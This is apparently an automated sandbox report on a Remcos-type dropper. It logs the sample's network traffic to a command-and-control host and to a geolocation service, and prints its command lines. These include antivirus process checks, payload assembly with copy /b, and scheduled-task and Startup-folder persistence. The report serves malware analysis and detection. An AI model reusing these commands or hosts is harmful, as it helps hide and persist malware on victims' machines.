                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-07T10:15:37.464130+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.564689193.26.115.397009TCP
                                                                  2025-01-07T10:15:39.663394+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.564705178.237.33.5080TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 7, 2025 10:15:18.831062078 CET6458753192.168.2.51.1.1.1
                                                                  Jan 7, 2025 10:15:18.835963011 CET53645871.1.1.1192.168.2.5
                                                                  Jan 7, 2025 10:15:18.836036921 CET6458753192.168.2.51.1.1.1
                                                                  Jan 7, 2025 10:15:18.840919971 CET53645871.1.1.1192.168.2.5
                                                                  Jan 7, 2025 10:15:19.290338993 CET6458753192.168.2.51.1.1.1
                                                                  Jan 7, 2025 10:15:19.295301914 CET53645871.1.1.1192.168.2.5
                                                                  Jan 7, 2025 10:15:19.295386076 CET6458753192.168.2.51.1.1.1
                                                                  Jan 7, 2025 10:15:36.904246092 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:36.909812927 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:36.911639929 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:36.916748047 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:36.921452045 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:37.420002937 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:37.464129925 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:37.550116062 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:37.554651976 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:37.559432983 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:37.559609890 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:37.564363956 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:37.904980898 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:37.906472921 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:37.911732912 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:38.994836092 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:39.042145014 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:39.045226097 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:15:39.050057888 CET8064705178.237.33.50192.168.2.5
                                                                  Jan 7, 2025 10:15:39.050163984 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:15:39.050323963 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:15:39.055049896 CET8064705178.237.33.50192.168.2.5
                                                                  Jan 7, 2025 10:15:39.663320065 CET8064705178.237.33.50192.168.2.5
                                                                  Jan 7, 2025 10:15:39.663393974 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:15:39.677323103 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:39.682176113 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:40.501095057 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:40.505229950 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:15:40.510071993 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:15:40.662640095 CET8064705178.237.33.50192.168.2.5
                                                                  Jan 7, 2025 10:15:40.662734032 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:16:10.512877941 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:16:10.514177084 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:16:10.518987894 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:16:40.565021992 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:16:40.566791058 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:16:40.571657896 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:17:10.592489004 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:17:10.594189882 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:17:10.599076986 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:17:29.012052059 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:17:29.495676041 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:17:30.198806047 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:17:31.498065948 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:17:33.995682955 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:17:38.835067034 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:17:40.646034956 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:17:40.648165941 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:17:40.654625893 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:17:48.496803999 CET6470580192.168.2.5178.237.33.50
                                                                  Jan 7, 2025 10:18:10.665107012 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:18:10.667788029 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:18:10.672621012 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:18:40.705250025 CET700964689193.26.115.39192.168.2.5
                                                                  Jan 7, 2025 10:18:40.707397938 CET646897009192.168.2.5193.26.115.39
                                                                  Jan 7, 2025 10:18:40.712268114 CET700964689193.26.115.39192.168.2.5
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 7, 2025 10:15:03.947066069 CET6038653192.168.2.51.1.1.1
                                                                  Jan 7, 2025 10:15:03.956187963 CET53603861.1.1.1192.168.2.5
                                                                  Jan 7, 2025 10:15:18.830409050 CET53579871.1.1.1192.168.2.5
                                                                  Jan 7, 2025 10:15:36.756628036 CET5424753192.168.2.51.1.1.1
                                                                  Jan 7, 2025 10:15:36.898453951 CET53542471.1.1.1192.168.2.5
                                                                  Jan 7, 2025 10:15:39.034598112 CET6121653192.168.2.51.1.1.1
                                                                  Jan 7, 2025 10:15:39.042054892 CET53612161.1.1.1192.168.2.5
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 7, 2025 10:15:03.947066069 CET192.168.2.51.1.1.10x9a8aStandard query (0)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 10:15:36.756628036 CET192.168.2.51.1.1.10xcb07Standard query (0)me-work.comA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 10:15:39.034598112 CET192.168.2.51.1.1.10x9809Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 7, 2025 10:15:03.956187963 CET1.1.1.1192.168.2.50x9a8aName error (3)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 10:15:36.898453951 CET1.1.1.1192.168.2.50xcb07No error (0)me-work.com193.26.115.39A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 10:15:39.042054892 CET1.1.1.1192.168.2.50x9809No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                  • geoplugin.net
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.564705178.237.33.50801848C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 7, 2025 10:15:39.050323963 CET71OUTGET /json.gp HTTP/1.1
                                                                  Host: geoplugin.net
                                                                  Cache-Control: no-cache
                                                                  Jan 7, 2025 10:15:39.663320065 CET1171INHTTP/1.1 200 OK
                                                                  date: Tue, 07 Jan 2025 09:15:39 GMT
                                                                  server: Apache
                                                                  content-length: 963
                                                                  content-type: application/json; charset=utf-8
                                                                  cache-control: public, max-age=300
                                                                  access-control-allow-origin: *
                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                  Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:04:14:56
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\Desktop\RailProvides_nopump.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\RailProvides_nopump.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'328'655 bytes
                                                                  MD5 hash:5BF20E8953B3219CD4F60BE10A73509F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:04:14:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:04:14:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:04:14:59
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0xc0000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:04:14:59
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                  Imagebase:0x5f0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:04:14:59
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0xc0000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:04:14:59
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                  Imagebase:0x5f0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:04:15:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c md 361684
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:04:15:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:extrac32 /Y /E Approaches
                                                                  Imagebase:0x9c0000
                                                                  File size:29'184 bytes
                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:04:15:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /V "Korea" Measurement
                                                                  Imagebase:0x5f0000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:04:15:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:04:15:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:04:15:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:Propose.com U
                                                                  Imagebase:0xe40000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:false

                                                                  Target ID:14
                                                                  Start time:04:15:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:choice /d y /t 5
                                                                  Imagebase:0x7f0000
                                                                  File size:28'160 bytes
                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:04:15:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:04:15:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:04:15:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                  Imagebase:0x380000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:04:15:02
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:04:15:02
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:04:15:03
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                  Imagebase:0x7ff6cb230000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:04:15:03
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                  Imagebase:0x240000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 0%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:04:15:14
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                  Imagebase:0x7ff6cb230000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:04:15:15
                                                                  Start date:07/01/2025
                                                                  Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                  Imagebase:0x240000
                                                                  File size:947'288 bytes
                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:18.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:20.7%
                                                                    Total number of Nodes:1525
                                                                    Total number of Limit Nodes:33
                                                                    execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW 